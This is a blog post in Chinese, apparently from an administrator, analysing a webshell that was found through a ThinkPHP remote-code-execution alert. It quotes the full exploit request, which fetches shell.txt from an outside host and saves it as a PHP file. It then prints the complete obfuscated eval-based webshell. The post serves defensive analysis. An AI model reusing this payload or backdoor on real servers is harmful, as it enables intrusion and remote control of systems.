一枚冗余代码的 webshell 分析
排查服务器告警的时候发现了一条 ThinkPHP RCE 的攻击尝试,引发了对一个 webshell 的分析
获取 webshell
告警的 payload 如下:
1
GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://www.520yxsf.com/shell.txt&vars[1][]=libsoft.php HTTP/1.1
webshell 地址:http://www.520yxsf.com/shell.txt
curl 了一下出现了注意钓鱼的提示:
1 2 3 4 5 6
» curl http://www.520 yxsf.com /shell .txt ... <h2> What is phishing?</h2> <p> This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source .</p > ...
那当然是点击 Dismiss this warning and enter site
啦。
等一下,既然会被 Cloudflare 拦截,那么这个人的 payload 相当于没用啊。。。没事不要在意这些细节。。。
webshell 分析
拿到的 webshell 是这样的:
1
<?php define ('lkDwreIpUtyOiuvSVCZTJYLEQNMWPaAshFcoxGbHfBmXdgqKRjnz0209' ,__FILE__ );$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ =urldecode ("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A" );$rlbtQZsXxwWyRTJzUGLdHYhVSDBuAjqnmPeoNiMcIOfagkEvpKFC =$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {3 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {6 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {33 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {30 };$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk =$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {33 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {10 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {24 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {10 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {24 };$OpwGjCKDbakQuJWnEBXAHoMscxPUhZyFiYVeTmrtSIlgfzNdLqRv =$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk {0 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {18 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {3 }.$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk {0 }.$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk {1 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {24 };$XlFyvsPgLIcWEUJkzKhdxZjrumSDMoAntqHpbGOCafVYeNiQTRwB =$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {7 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {13 };$rlbtQZsXxwWyRTJzUGLdHYhVSDBuAjqnmPeoNiMcIOfagkEvpKFC .=$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {22 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {36 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {29 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {26 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {30 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {32 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {35 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {26 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {30 };eval ($rlbtQZsXxwWyRTJzUGLdHYhVSDBuAjqnmPeoNiMcIOfagkEvpKFC ("JHlyTnNCbVlRUHdxb0RSelZJY0h1ZGVpT3B2TVhhYkxTRktBR1VoZnRnRUprWm5UamxDV3g9InlzZUp2emdkR2J4T0JqU1hQTldLUXdtbGNUdENVWmlwcUZJSGtvUnJNdW5mREVoWVZMYUFLTkhsZ1NkdFFqa3ZzWUxUdWFpY2JGeXFmUFdScHp3bm1EckdDQnhJSlZBWGhvVVpPZUVNdWg5RkVHTWR6UU95RWk1cWNSdGFqM0R5SHBPUEh5bHhMcHRRejNzY1AyazJMb2tDdGlXb3RvV25PR3RaaXBsRU9wNUtaaW5WZjNVWWIyVVRwQ0RiT3kxcUpockZ2TGZOalFXb3QzbHFMVHNPdEdxdUVUTzJwMXpoaXF4Y2lwa0RwcDVhTzFzVWJUYUJ4eWFnSG90d0xRelJqT1VDejNEZXB5blZIWU1LSmhDbnZLeEZMMGFnTE96NnpETzJQcG5XaUM1R3BwelJIcHhwUFFXQnRRbFBFQ1U0RVRhdWlpRFZ6VGx5aW9PWXB5a1R0M09rYml0YnVUT0tqUXhxWjI5Q3pMZHdsUHpESkxwM2JMcDJKd3BLeHdwMnhScDJKUHBxYXBKcWFTWnFhU2JGbFBaNUpZZHFKQ2JxYVNNcWFTZHFhU3BxYVNvcWFTQ3FKQ28ybFB6aGxQZktsUHpSbFBaMGxQWjN2THAxeHdwMmFMcDJ2UnAySktwM0pLcDNhS3AyeFlicUpDcnFhWVpTYUtwMmJMcm52S3hlRTJrV3gwOW56VGxzeHl6cnBvMVVmcDVGcDNPVEVET1JacW5oakFueEVxVVNaMXpMT0dxQUxDcXp4aTk0ekd6SnhHeDN1THhGTDBhZ0xPejZ6RE8yUHBuV2lDNUdwcHpSSHB4cFBRV0J0UWxQRUNVNEVUYXVpaURWelRseWlvT1lweWtUdDNPa2JpdGJIU2E5ZXd4RkwwYWdMT3o2ekRPMlBwbldpQzVHcHB6UkhweHBQUVdCdFFsUEVDVTRFVGF1aWlEVnpUbHlpb09ZcHlrVHQzT2tiaXRiSFN6OWV3eEZMMGFnTE96NnpETzJQcG5XaUM1R3BwelJIcHhwUFFXQnRRbFBFQ1U0RVRhdWlpRFZ6VGx5aW9PWXB5a1R0M09rYml0YkhTSlNYTDRDZm9XaGowcWlIeXhPdEMxY2pPbnZ4MURRYkFxb09va0lFR3h3cDJuckhRcVNQMXFVanlPS3pxVURaMWxOTzN0MWZwREFwR05TSkcwN2xRa09pQW5xZnFzR3RHVTVPcWxBUEREenh5RGNaMjl2YnluQk9vRGx4cGFucDJXdUxHYUNMMVVrekN4VnQzc1d0eWxUUFRwOWxHc2ViMjlsT0FuQ09UemFMeTFFUEN0eHhDbDV4RHhKRTJVMFpxYW1MR1VuZjA5elppNXFmeXpaeGlhTGpEdDN0VERzejFzN0pTYTlld3hGTDBhZ0xPejZ6RE8yUHBuV2lDNUdwcHpSSHB4cFBRV0J0UWxQRUNVNEVUYXVpaURWelRseWlvT1lweWtUdDNPa2JpdGJIU29GWEw0Q2ZvV2hqMHFpSHl4T3RDMWNqT252eDFEUWJBcW9Pb2tJRUd4d3AybnJIUXFTUDFxVWp5T0t6cVVEWjFsTk8zdDFmcERBcEdOS2FHMFZsR3NlYjI5bE9BbkNPVHphTHkxRVBDdHh4Q2w1eER4SkUyVTBacWFtTEdVbmYwOXpaaTVxZnl6WnhpYUxqRHQzdFREc3oxczdKUHM5ZXd4RkwwYWdMT3o2ekRPMlBwbldpQzVHcHB6UkhweHBQUVdCdFFsUEVDVTRFVGF1aWlEVnpUbHlpb09ZcHlrVHQzT2tiaXRiSFNyMFhQTkNFUXpKT2k5NXRBc3BQcXF4ejFzV2Zwbm10VGxOWmlsUHgyNVN4eU8wSFFXM3hEemhiaXFZTzFuZUxpeERQVG51cENVWmJZMENqRE9FSHlPS3BvdDBIR3FpcHl0SnBPcVFacG5ZajA1UkV5VXBicHFEYjJxUEUwOXJmMnhlaUdEeXhRNTNmUTEyWnF0YXRUTkZYTDRDZm9XaGowcWlIeXhPdEMxY2pPbnZ4MURRYkFxb09va0lFR3h3cDJuckhRcVNQMXFVanlPS3pxVURaMWxOTzN0MWZwREFwR05rdkcwVmxHc2ViMjlsT0FuQ09UemFMeTFFUEN0eHhDbDV4RHhKRTJVMFpxYW1MR1VuZjA5elppNXFmeXpaeGlhTGpEdDN0VERzejFzN0ozMFZsUWtPaUFucWZxc0d0R1U1T3FsQVBERHp4eURjWjI5dmJ5bkJPb0RseHBhbnAyV3VMR2FDTDFVa3pDeFZ0M3NXdHlsVFBUTzdKRzBWbFFrT2lBbnFmcXNHdEdVNU9xbEFQRER6eHlEY1oyOXZieW5CT29EbHhwYW5wMld1TEdhQ0wxVWt6Q3hWdDNzV3R5bFRQVE83SlQwVmxHc2ViMjlsT0FuQ09UemFMeTFFUEN0eHhDbDV4RHhKRTJVMFpxYW1MR1VuZjA5elppNXFmeXpaeGlhTGpEdDN0VERzejFzN0pZeDl2S3hSSG9PMHpHbnNMcGtGWnF0bU9DYW5mMW5Wemk5MUVRemJFMU8yaUdsUVBPRDNQMmtyejBuZXAwdDVQeURvZmkxWU9EcUx1THhGTDBhZ0xPejZ6RE8yUHBuV2lDNUdwcHpSSHB4cFBRV0J0UWxQRUNVNEVUYXVpaURWelRseWlvT1lweWtUdDNPa2JpdGJIU3Q5ZXd4RkwwYWdMT3o2ekRPMlBwbldpQzVHcHB6UkhweHBQUVdCdFFsUEVDVTRFVGF1aWlEVnpUbHlpb09ZcHlrVHQzT2tiaXRiSFNvU1hQTkNMMldOanB0dUVpT0ticHp5TERzYVpURHZmRGExTzJVT2J5bEViMjU2cGluWmYyYWlwcXg1ejBubGlwT2dIUXgyUG94MHRLNDlsR3NlYjI5bE9BbkNPVHphTHkxRVBDdHh4Q2w1eER4SkUyVTBacWFtTEdVbmYwOXpaaTVxZnl6WnhpYUxqRHQzdFREc3oxczdKWWw5ZXd4RkwwYWdMT3o2ekRPMlBwbldpQzVHcHB6UkhweHBQUVdCdFFsUEVDVTRFVGF1aWlEVnpUbHlpb09ZcHlrVHQzT2tiaXRiSFNKMlhMNENmb1doajBxaUh5eE90QzFjak9udngxRFFiQXFvT29rSUVHeHdwMm5ySFFxU1AxcVVqeU9LenFVRFoxbE5PM3QxZnBEQXBHTkt2VDBWbEdzZWIyOWxPQW5DT1R6YUx5MUVQQ3R4eENsNXhEeEpFMlUwWnFhbUxHVW5mMDl6Wmk1cWZ5elp4aWFMakR0M3RURHN6MXM3Sll6OWV3eEZMMGFnTE96NnpETzJQcG5XaUM1R3BwelJIcHhwUFFXQnRRbFBFQ1U0RVRhdWlpRFZ6VGx5aW9PWXB5a1R0M09rYml0YkhTSkZYTDRDZm9XaGowcWlIeXhPdEMxY2pPbnZ4MURRYkFxb09va0lFR3h3cDJuckhRcVNQMXFVanlPS3pxVURaMWxOTzN0MWZwREFwR05TSkEwVmxHc2ViMjlsT0FuQ09UemFMeTFFUEN0eHhDbDV4RHhKRTJVMFpxYW1MR1VuZjA5elppNXFmeXpaeGlhTGpEdDN0VERzejFzN0pTTzlld3hGTDBhZ0xPejZ6RE8yUHBuV2lDNUdwcHpSSHB4cFBRV0J0UWxQRUNVNEVUYXVpaURWelRseWlvT1lweWtUdDNPa2JpdGJIU3IyWEw0Q2ZvV2hqMHFpSHl4T3RDMWNqT252eDFEUWJBcW9Pb2tJRUd4d3AybnJIUXFTUDFxVWp5T0t6cVVEWjFsTk8zdDFmcERBcEdOU0pHMDd6VHpValJkQ0wyV05qcHR1RWlPS2JwenlMRHNhWlREdmZEYTFPMlVPYnlsRWIyNTZwaW5aZjJhaXBxeDV6MG5saXBPZ0hReDJQb3gwdEtkd0xDVXZqT3pJYVR4VUpEbEZ6b09GSFFPVHpRa0NqRHpsTzBmNU9pYkthT0RDTzNzbk9oRHZaaU9RTEFxekp5VVJ6aWtRYjF4R3hxbkxKRG4zcFNzTnhEWktIb3pFeFBNNUxpMTR4UW9GTFl4cWlvejBPT3pDYnFxWmZHc2lqQ0JLTzF6UlB5bFdFb3p6RVNPZXB5a0Z0eXhERW9uRXgxbm1PUE01UERCRnpvT1VqRFpTT0NPNEh5eFRPcWFZeHlVR1pxVUVhRGxUem9rWXhQb1NwUHNjRWlERHBxc2lKUXhCWnk1Y2Zxbk5pQ2xpT3lrTHpEVVFqRE9RZkd6UEVTcDJpQ3ROT094clBxYU9KQXNTcDFVTGFPQ0ZFRHF6T1RmMU9Qc2NqRG9LalFVekVxbzVMaW4walF4V3hBYWViMkpncFFxWXRwbkR0R2x3eFNEck9obE5qUWFJeEN0RUUyVXhPRHRRSER4VmJxeENPeXhnT3FPY0VPdElQQU9xam96a08wVXZFcXpOTHFPcU8yeGVwMXpOeHlyU0VRV0NFM1VEem9VWWowbkdIRHpUakFzTloya1JMUXhyRWhPaWpvblZPb3pRaXFsV3hDV3pKWXF1cGkxRmoxekR4Q25MT3A1Rk9QbDBwRGFyUHlXUEppVTRpeVdMdGliU2JBeENqcG5aT0RVT2owbkdFUTFweHF6MnpPVUV0MXpEYU9uT08yeHhacVVRTDJEVk9BcXd4MHpuT1BzQ3RpSkZpeWtDTFFVS3poc0xPMW9GeEFzekppeFVwU3NORTFsT0pQenBKcG5sTzBPbGowbnJQeTFpRVNPMFpQc0xmUXhEZkdVcU8yeE56UWtpTE90R3ZPT0NKWU94ekR0RkVPYmtQeURxeENuNWlQbEJieU9OeENhcHgwekVwWXNFdDFKRmpveGlKQVVRaUNwRmYwbkRMWXhMaURsSXppV1FMcXhyYnlxaUpBc1RwUGxOSHF0V2Fpa3dKMXpnaXlrUmZxelppcXFZRTFudk9PVUNwUWxERVE1UEUzeHBwWWFOUDFxT3BBVXdPMDVPTzF6bGZwMW5FM2FjeDJVV09veml0eU9aaUF0aXhQT0VPT3RDcGlsWnhDV1VqcXo1WkN0UUVPcEZ6R09ZSkRuTnpvVUJmeWJGcHF0eEpvekZpUERDWk9KRmpRV0xPUG8yT2hEY0xPdERMaTljTG81V095TjF0UW9GcEFzQ3hUczR6T3RDalF4Tk9DcVR4U3FPemhyMXBpeFRmUXFwSnA1VXpwemNIT0NLRW9scWpvemhPb3RRaXFyRmlBdFBKUWtvT1lsNHhxbkRKR2FjeHBCMHBxVUxFMk9JeENucExvbG5PWWxGTzFvS2pHblRqUE9OWllhaWoxbk5iQWxpaURueloyV0VQcU9aekRzd3hpVVZwMlcwT0RyU2pvOXpPT2w0WnF0dk9PdGlMVGFjeHBCMHBxVUxFMk9JeENucExvbG5PWWxGTzFvS2pHblRqUE9OWllhaWoxbk5iQWxpaURueloyV0VQcU9aekRzd3hpVVZwMlcwT0RyU2pvOXpPT2w0WnF0dk9PdGlMVHNKYjFsZ2l5VzRPeXJTamhsWXhxbHVPMXpRanFPR0pUVVBqVE1rWjIxNEVEcU5QQ1V3akM1R2lxVUxhUW9Tem9PaUUwNVJaT3R2aUR0SXRvbkV4T3p2emlONXAxYVFFb2FlYjFsNml5a0VQMmxUdG9PVWlEbGVaMVVOanFuWmlxelB4eVUyT0NVQ3RPT3JPQUR6RVNxcE8yNUJwMmFXUHk5eGlHc0xwaVc0RUR0T3pvdFl4VHhjcFBEQ2YxbFRwQzVKeG9EU0xDT2NhRGxacHlXcUUwemNPb1VSRU9aS2ZEdHhKeWs2TzIwMWpRclNPeTlFam9sS09xVUVpaWFJaUM1T2lReGJaQ09CanFhSXREeExKMmt1aU9PTEhRbFRQcU9UT0NxRkwxYUlmbzkzdVAwd2NMQzd1UzQ4dTNzQmZSc0N6aXpuanlwQmwzT2diMGt4akFxUGZvdHV6VGFrUHF4MnBEbld4cHp3RVFrNFoxbGx6MERtT3lXekx5elRIeXFLaUd0ME9wbFVQcFVlem9iRkpZTTVsS2tORTB4M2Z5T2xmRE8wSHA5bnRUelBPQ2FFT29uelBvT3hQQzFUcFFEc2YyVVFaMjk0eDJscnpDbFdpUXhBZnBXTEV5NTZKaHJGdkxDN2xvYUpQaXpEalFxVWYybnBicDlianlVY3BURE96MFcxT0N0b3QxYTVqMHpyek9sNFp5YVRFMVVGdHkxRWlUeDZmQ2xDTHA0OXRUbE56UU9ZajJ4cWNScnFhQ3BrbFB0c2xQWktsUGxRbFB6b2xQWmthTHAxYktwM2F3cDNhaE1xYVlDS3ZScEt4UnAzSlJwM3ZScDNhTHAzSkxwM3ZMcEtiUFpxYUNKcWFTcnFhQ3JxYVlicWFZZjVsUE9RbFBaMWxQWjRsUFpTbFBmU2xQZjNsUHpRYVJwS2J3cDJhWUozbFB6c3J3QzdsRGFEUFRxNkUydHpwR3oxenlVcXBxRHJieWtwZmlub1BRNTNQQzlHTENEbFoyOVRIUWxFYjJ4aVpwV1pPVGFLdG96V2ZRQzlsb2FKUGl6RGpRcVVmMm5wYnA5Ymp5VWNwVERPejBXMU9DdG90MWE1ajB6cnpPbDRaeWFURTFVRnR5MUVpVHg2ZkNsQ0xwNTdKMzBWbG9hSlBpekRqUXFVZjJucGJwOWJqeVVjcFRET3owVzFPQ3RvdDFhNWowenJ6T2w0WnlhVEUxVUZ0eTFFaVR4NmZDbENMcDU3YUEwVmxvYUpQaXpEalFxVWYybnBicDlianlVY3BURE96MFcxT0N0b3QxYTVqMHpyek9sNFp5YVRFMVVGdHkxRWlUeDZmQ2xDTHA1N0pTYTlld3hoUG8xeXhpa25aVGFtT29EdXBRNUJMcURrT2l0ZXRPekd4R3RQSGk5UUxRT0xIUWxZTzJXWmZHeldpcXEwSEFsUnpvcXZIU0pGWFBOQ3R5OTZQaU94TERhSnRPc2xFcVVjamlXUVAyNU9wQ1dHRXBhVWlDeFRQeXhSWjNxRGZ5dE5mM0R3enFxME9HVUJ0MERpZmgwQ2Iwa2F6Q09ORWlEU0VxeHNQMXNWRW9ueGZPT0FMM09peDB4M3AzcWd4Q1VxcEFVd1oxdElpR3Myak9uenRHbktieXhsUEFOU0ozMFZsb2FKUGl6RGpRcVVmMm5wYnA5Ymp5VWNwVERPejBXMU9DdG90MWE1ajB6cnpPbDRaeWFURTFVRnR5MUVpVHg2ZkNsQ0xwNTdKUHM5ZXd4aFBvMXl4aWtuWlRhbU9vRHVwUTVCTHFEa09pdGV0T3pHeEd0UEhpOVFMUU9MSFFsWU8yV1pmR3pXaXFxMEhBbFJ6b3F2SFNyMFhMNENiMGthekNPTkVpRFNFcXhzUDFzVkVvbnhmT09BTDNPaXgweDNwM3FneENVcXBBVXdaMXRJaUdzMmpPbnp0R25LYnl4bFBBTmtKRzBWbG9hSlBpekRqUXFVZjJucGJwOWJqeVVjcFRET3owVzFPQ3RvdDFhNWowenJ6T2w0WnlhVEUxVUZ0eTFFaVR4NmZDbENMcDU3Sll4OXZLeGtwR1VpeEFzb3gyekxMeWFFelFrSmJ5OTJPcDEzTzJVbkxpRHFiT0RtUHFhZWYxcTVqVG51ZnlsaGlHTzBMRHhERTI1QXVMeDJqM25hek9EcnAwazFwb3FtaW9uV0UwenVqcU9MTDB0bmIyREV4RHR2em9sWUhwT0t6MmtTZmlseWlUeHBIUVUzYk96RkhTczlld3hoUG8xeXhpa25aVGFtT29EdXBRNUJMcURrT2l0ZXRPekd4R3RQSGk5UUxRT0xIUWxZTzJXWmZHeldpcXEwSEFsUnpvcXZIU280WEw0Q2Iwa2F6Q09ORWlEU0VxeHNQMXNWRW9ueGZPT0FMM09peDB4M3AzcWd4Q1VxcEFVd1oxdElpR3Myak9uenRHbktieXhsUEFOU1hMNEN0eTk2UGlPeExEYUp0T3NsRXFVY2ppV1FQMjVPcENXR0VwYVVpQ3hUUHl4UlozcURmeXROZjNEd3pxcTBPR1VCdDBEaWZHTkZYTDRDdHk5NlBpT3hMRGFKdE9zbEVxVWNqaVdRUDI1T3BDV0dFcGFVaUN4VFB5eFJaM3FEZnl0TmYzRHd6cXEwT0dVQnQwRGlmR05rWEw0Q2Iwa2F6Q09ORWlEU0VxeHNQMXNWRW9ueGZPT0FMM09peDB4M3AzcWd4Q1VxcEFVd1oxdElpR3Myak9uenRHbktieXhsUEFOS2FHMDdsUWFjaW9xQmpUT2VaQ2xEdDNVaHBxc1NQM2xVRWk5RnBpbjV0Q3hrT0F4QWlwekdPbzVOUHBrQ0UwVVR6aTV5aUFuUGJPcDlsb2FKUGl6RGpRcVVmMm5wYnA5Ymp5VWNwVERPejBXMU9DdG90MWE1ajB6cnpPbDRaeWFURTFVRnR5MUVpVHg2ZkNsQ0xwNTdhMzBWbG9hSlBpekRqUXFVZjJucGJwOWJqeVVjcFRET3owVzFPQ3RvdDFhNWowenJ6T2w0WnlhVEUxVUZ0eTFFaVR4NmZDbENMcDU3SlBhOXZLeFB4cDE1SHlXQWlPczJ0aXpCek9seExvbE5PR0RteG9rVnQwNXV4MG5zTGlhZ08zVXdpQ2FDT3lEZWlET1NmQXhRalRzbmVZMENiMGthekNPTkVpRFNFcXhzUDFzVkVvbnhmT09BTDNPaXgweDNwM3FneENVcXBBVXdaMXRJaUdzMmpPbnp0R25LYnl4bFBBTktKQTBWbG9hSlBpekRqUXFVZjJucGJwOWJqeVVjcFRET3owVzFPQ3RvdDFhNWowenJ6T2w0WnlhVEUxVUZ0eTFFaVR4NmZDbENMcDU3SlN6OWV3eGhQbzF5eGlrblpUYW1Pb0R1cFE1QkxxRGtPaXRldE96R3hHdFBIaTlRTFFPTEhRbFlPMldaZkd6V2lxcTBIQWxSem9xdkhTcjVYTDRDYjBrYXpDT05FaURTRXF4c1Axc1ZFb254Zk9PQUwzT2l4MHgzcDNxZ3hDVXFwQVV3WjF0SWlHczJqT256dEduS2J5eGxQQU5LYUEwVmxvYUpQaXpEalFxVWYybnBicDlianlVY3BURE96MFcxT0N0b3QxYTVqMHpyek9sNFp5YVRFMVVGdHkxRWlUeDZmQ2xDTHA1N0pTczlld3hoUG8xeXhpa25aVGFtT29EdXBRNUJMcURrT2l0ZXRPekd4R3RQSGk5UUxRT0xIUWxZTzJXWmZHeldpcXEwSEFsUnpvcXZIU0pLWEw0Q2Iwa2F6Q09ORWlEU0VxeHNQMXNWRW9ueGZPT0FMM09peDB4M3AzcWd4Q1VxcEFVd1oxdElpR3Myak9uenRHbktieXhsUEFOU2FUMFZsb2FKUGl6RGpRcVVmMm5wYnA5Ymp5VWNwVERPejBXMU9DdG90MWE1ajB6cnpPbDRaeWFURTFVRnR5MUVpVHg2ZkNsQ0xwNTdKWXo5ZXd4aFBvMXl4aWtuWlRhbU9vRHVwUTVCTHFEa09pdGV0T3pHeEd0UEhpOVFMUU9MSFFsWU8yV1pmR3pXaXFxMEhBbFJ6b3F2SFNKRlhQV3F0eUROY1J4UHhwMTVIeVdBaU9zMnRpekJ6T2x4TG9sTk9HRG14b2tWdDA1dXgwbnNMaWFnTzNVd2lDYUNPeURlaURPU2ZBeFFqVHNuY1JsY3hPbHZ6cFVRSk9PTnhZT1BqT3oyWlNsTnRPSkZpeXFDalRVT1oyMUZ0REJrRVFuQ0oxbDNaUHNCcE9iRnpoekV4QXNSWnB6dnhxeld4Q25weHA1V09RV2NpcVprT1BxbGppa0laU3I1UE94WmlDekVKRGx1WlBzUWZPYWlFRERpakNsNE9DenZ4MXFWcFl6aUpwQjB6RE9GYjFuT0VEc3hKMG5VTzFma3BxQ0tIb1VQSjJ4QnpPemlqMmxXaXk1UGpvNDFPWXMwalFvS2ZvbkN4UE96aU9VY1B5RGlPcWx3aW80a2lpV3ZiMW5HaXFhT3hpVUdpUGw0Ynl4VmJDenFqRGxET2hhQkhRRERIR3pUanl4RU95MDFMUURPRVNPd0pUc1JPMHRGYXlsTk9DcWl4bzVQT09PYUhwNUdmb1dVeHF6SXAyNVJmT3hOcFlEWU9ReFVpeWtMZk94R0VEenhqeVVST2luaVBpYVFMcXRwTER6NFBZc0VqMkQ2akdxTHhxekJPMjFBYVFESWlZYWl4MHpKaUN0Z3QyeHJQcXF2SkRuVnBTYUNKcWFaejNuQ2pDNXBwQ1VjRTJhVnpoc3pPM3N4elE1Q09PcU90UVVUTzFsSlpTbGdKMWxXem9rQ0oxbDZaUGxMUERhaVBBT0NqeXg1UFlhY2JDMWlFaHpwaUdzVHBQYVJmT3hOcFlEcEV5eHJPMXRhdDJPSUpQc2F4VFUzT2lXQ2l5RDZqR25pTzBucFp5a0ZicXpOYllsWUpoT3hwU2xRZkMwRmlUVWF4Q1pLaUN4QWZDcW10UWtDanB6U0wwYVllMXNuWjNPY3hDNVFPRFVOYXlvS3pEbk9MREJraXkxQmpET054Q3F4alRVT1oxdEZ4T3hHYVBhcEVTcXJwMldRTHFDS3ZPVXF4MG5VcFBsTE8xcU90RHFpaW81NXpvT0V0UWFHRTI5Y0xEbjJ6aU5rakRPT0VEeHBMRHp4cDF0RmlPYVdKVGxMRVNxMU9xemNQRHJLam94ek9Bc0RPWU0xRTFEV1BZT0xpb25WWkNVdkhEcVdpcW5DeHFyMFpwVUNicXpWYmk5Y0xvenh6cHpFeDJhRHBDVUVqb25laVBERkUybERIb2F3SjFuaU9EVUNpUURHam9uek8xelJPT3RGUDFwRnRHblRpUWswemlONUhPcUlQcXFDaURsbE9DT2lmeWxXWjI5Y3hPbHZ6cFVRSk9PTnhZT1BqT3oyWlNsTnRPSkZpeXFDalRVT1oyMUZ0REJrRVFuQ0oxbDNaUHNCcE9iRnpoekV4QXNSWnB6dnhxeld4Q25weHA1V09RV2NpcVprT1RhY3gwNWVPME9OajJsWk9Da3pFMG5RemhhQnhET05iQW5wSjBuQlpPZjV0MU9UZmhPQ0UxbDRPeTVManF0T2lDVWl4UE9TT0RPNEUyb0ZFRFVFT1NPV08yNUZPRERpT1REYUVpV1NMQ1VRcGlPUWlDdFl4T2xyaXlrY0wxQ2tmUVd3eFRVaFpZYUVPcXhaekRVVXgya2NpT3RpYnFPVGZvOU9KR3g2TzFVTnRRT0l2VHF6RTA1enpEVUxMT3pET0Fsd2ppYWdMQ09MUHlPcnhZRE9qb1oxcDIxaXR5SktqR09QSkRubnpRMTRPaWFXZkd4RUppVW16aGFMdDJvRkVERHBKUWIyaUN6RmJ5RFFQQ3ppanB6Y09vT3ZqT3hJTHFuaUpPT1NMQ3R2TDF0RGpROXdpRHpKaWlXY3h5YlNFb3hPam9sNk9oYWNFUURUdlR0T08zTTF6UVdMSER6VnB5NVRPT25yT0NwMWYxeE9IUVdVSlFVWmlxZjFqT3RWZkR4eE9xT1NMQ3R2TDF0RGpROXdpRHpKaWlXY3h5YlNFb3hPam9sNk9oYWNFUURUdlR0T08zTTF6UVdMSER6VnB5NVRPT25yT0NwMWYxeE9IUVdVSlFVWmlxZjFqT3RWZkR4eE9xT0ZQb2FMSERPckVEdExqQ2xEcFlsRXAxYVdQeURFeDNVYXBpMDVKcXpPSlBhaUp5VUZwMXRRakREaXhBRHBqbzVKWlNETmFpbFpmRHNZanBub08wVWlKRGFRcEN6VUpZT1ZMMGFMeE94WkVHVUNPQ25Mek9PRmpRclNQQXN3RTN4R2lpNUVmMXpyTEFEd08yeHppUGFDSlFhR3RvcU94UHFyemkxTFpPRFRFRHhMT3FuQnAxTzR4RG5JYXBhVE95eGlQb3hzZjBuR1BDV1R4aWtnWnFVaVBEcUlMQ3pDSjJVb09pa1JIcWJTTHlVVU9TcTNPT3RGYWl4SXBBVWlqcWxWTzFPRUxEekRhVGFwT1RVSVpQc0JpRG5UYWkxVGpBc3BwT3pPZm9XUEUzc3V0UzA5cndDbnZTOCsiO2V2YWwoJz8+Jy4kcmxidFFac1h4d1d5UlRKelVHTGRIWWhWU0RCdUFqcW5tUGVvTmlNY0lPZmFna0V2cEtGQygkRndnUEVLV0JsdUR4WHpjYVl5dm1UWmJxU2Rqc0dlTG9KclZOUVJwVUFmSE9odEluTWlDaygkT3B3R2pDS0RiYWtRdUpXbkVCWEFIb01zY3hQVWhaeUZpWVZlVG1ydFNJbGdmek5kTHFSdigkeXJOc0JtWVFQd3FvRFJ6VkljSHVkZWlPcHZNWGFiTFNGS0FHVWhmdGdFSmtablRqbENXeCwkWGxGeXZzUGdMSWNXRVVKa3pLaGR4WmpydW1TRE1vQW50cUhwYkdPQ2FmVlllTmlRVFJ3QioyKSwkT3B3R2pDS0RiYWtRdUpXbkVCWEFIb01zY3hQVWhaeUZpWVZlVG1ydFNJbGdmek5kTHFSdigkeXJOc0JtWVFQd3FvRFJ6VkljSHVkZWlPcHZNWGFiTFNGS0FHVWhmdGdFSmtablRqbENXeCwkWGxGeXZzUGdMSWNXRVVKa3pLaGR4WmpydW1TRE1vQW50cUhwYkdPQ2FmVlllTmlRVFJ3QiwkWGxGeXZzUGdMSWNXRVVKa3pLaGR4WmpydW1TRE1vQW50cUhwYkdPQ2FmVlllTmlRVFJ3QiksJE9wd0dqQ0tEYmFrUXVKV25FQlhBSG9Nc2N4UFVoWnlGaVlWZVRtcnRTSWxnZnpOZExxUnYoJHlyTnNCbVlRUHdxb0RSelZJY0h1ZGVpT3B2TVhhYkxTRktBR1VoZnRnRUprWm5UamxDV3gsMCwkWGxGeXZzUGdMSWNXRVVKa3pLaGR4WmpydW1TRE1vQW50cUhwYkdPQ2FmVlllTmlRVFJ3QikpKSk7" ));?>
